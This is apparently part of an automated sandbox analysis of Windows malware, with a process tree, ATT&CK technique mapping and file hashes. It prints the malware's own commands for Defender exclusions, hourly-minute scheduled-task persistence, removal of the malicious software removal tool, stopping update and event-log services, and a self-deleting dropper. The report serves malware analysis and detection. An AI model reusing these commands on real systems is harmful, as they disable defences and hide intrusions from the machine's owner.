C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Api-loader.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Api-loader" /tr "C:\ProgramData\Api-loader.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2652
-
-
C:\Windows\Api-Injecter.exe"C:\Windows\Api-Injecter.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:844
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:3032
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:3172
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:220
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:1732
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:2328
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4764
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "FHWWYDZV"5⤵
- Launches sc.exe
PID:3728
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "FHWWYDZV" binpath= "C:\ProgramData\yuskvchsqzki\uhmlgtreufhe.exe" start= "auto"5⤵
- Launches sc.exe
PID:3716
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:2432
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "FHWWYDZV"5⤵
- Launches sc.exe
PID:4768 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Windows\Api-Injecter.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3180
-
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:2240
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\Shadow-Spoofer.exe"C:\Users\Admin\AppData\Roaming\Shadow-Spoofer.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3756
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3628
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3832
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3988
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2304
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2768
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:516
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4732
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5020
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:4488
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 2021442d8116d1c4c7714a1aa89aced2 pvvAJQf7pEK69MXKRNBjdA.0.1.0.0.01⤵
- Sets service image path in registry
PID:3696 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2104
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:212
-
C:\ProgramData\yuskvchsqzki\uhmlgtreufhe.exeC:\ProgramData\yuskvchsqzki\uhmlgtreufhe.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1724 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1740 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2480
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2596
-
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:4152
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3728 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1364
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:3676
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:4848 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1896
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1912
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1580 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4404
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:4352
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca1⤵PID:1420
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:2056
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5caaf5459b51d495e61be65d36ebc854d
SHA19197d0739f59ec5f4f3c9d5dbd0e4b5621ec04ff
SHA2561d44071558bbeec0bf02bc3dc0ef10ff26ae66bf24a9636ed5b039cc8ebfe8c6
SHA5124775e3d50f5ded7c5887941ecb4b7a7cb35406dd6f496e1ad74d3b7c7cda3b16884ebbd0f7bed4c11d54177dc8fc9c16eb7b082e9c06efd92f63a756ed950b3c
-
Filesize
944B
MD517b968c9721556b35cf8a2ef98286d6a
SHA155335b448c05adba0c62fc6528b771e411ff8d03
SHA2566adc59013f1bcd908b67b508e3cf45c53deea8fac46c1dc43c8f5aecf3bab5f6
SHA5122b4ecbae163c17a39c0b26240e51ffe7229ba369b54c3c49e03f3cd39da015c1ae7bc49a8eeb7324f014b45016c086bcd7471831cdd34d7380437bb51c90a219
-
Filesize
944B
MD5c31368594420b4b6a9d946a7ed4b7d42
SHA1832ee2115373d024a1e9757768f423f053b3e246
SHA256916bc292cec001a082ba8896d634ba802eba481906170c4bafbc1b5b4b061912
SHA5126b71aadeb6abb1f84cedc47ca23b5dc51856a204f260d0d8190b755d9ad3ccc6491f98c58db58de12963f4c31e39dc3787979f43541b8bcb95e0e1b4821936ca
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
944B
MD53072fa0040b347c3941144486bf30c6f
SHA1e6dc84a5bd882198583653592f17af1bf8cbfc68
SHA256da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e
SHA51262df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c
-
Filesize
944B
MD5ce4540390cc4841c8973eb5a3e9f4f7d
SHA12293f30a6f4c9538bc5b06606c10a50ab4ecef8e
SHA256e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
SHA5122a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
211KB
MD5c0094906b0e860b9df8aff26b335c308
SHA145e1941e2e0bb66b3701be26a8652c84604bfb7d
SHA25671c71f532a866536e7adb19d12996c2d088d38377b53d5cce792b6d416fee4a1
SHA5122af5f9d5535488b30ca51a9d01f4ef765c0be33075f2b6312c740c60de2746347ab7a6fc12f39f4dfc1594879d08298f6a9ea7d57740fc1738f426c36b03f855
-
Filesize
2.8MB
MD589a4a547350d31dfa563975180052828
SHA10f0c59f00a8d2f5d2079b4e479a2ec09884252c2
SHA256d579a712efa225339765971e60aea0a10edfd15c4be0b9a5f90936796afe6c92
SHA512d58dabdab8f8e10bb766238e13dc670172aa91ab0b9b2e4cc016078a32077ae67d146799efd3e66ca58575cd73452190f3a146ab11e12aa424f51cd71d46b768
-
Filesize
46KB
MD573ddab17680b091418d304083bc6e536
SHA1252446732b613d2b8c3a37ed83443c5288de3360
SHA256d6a2c5cc89dec06df1ebb1c22e1cf23befb4effb3a93f753f3bd19a1a2253d2b
SHA5124f29fe37e28acb1c70b65db10283fb37c0379272a61a06018ef8f0a0efe2f875028dc2a51d2cb7b0a2737170a9bd3aa422499536a63e11a2875debbfcadafdbc
-
Filesize
2.7MB
MD59cde9c988d7d848d5c6da9041cae11b4
SHA1cfc809e0b1684065fd5e52137bf506b26a4bc068
SHA256322b2c88ff31e0f9240b75e824dea0ae1d701fa239c04807d0ae4f785d222bb0
SHA512064662c482f8d59599efe4f1d2e315edde046171ab14b63c479509be7b1bee2127c607f104c33b539035d7e6ed85053b1b1e3a394e4981397014eaad08b0f707
-
Filesize
1KB
MD5384eca8bb0e7ae208a537c42339e31ba
SHA117e7db739cc367798eb9cf81c4683b54f861659d
SHA256f5523837e43b249e3c4d296febb9ebf77a1c6a8e5f850da469fa9d68abc46316
SHA51298b25b66c461aa28a391ef84af28b92c4ce189fbc5f350bcea3ee38d1444be77e8ac74cbeca9d6d938c13c862dcef1257314176c7abe409e5afc8d1e171d4265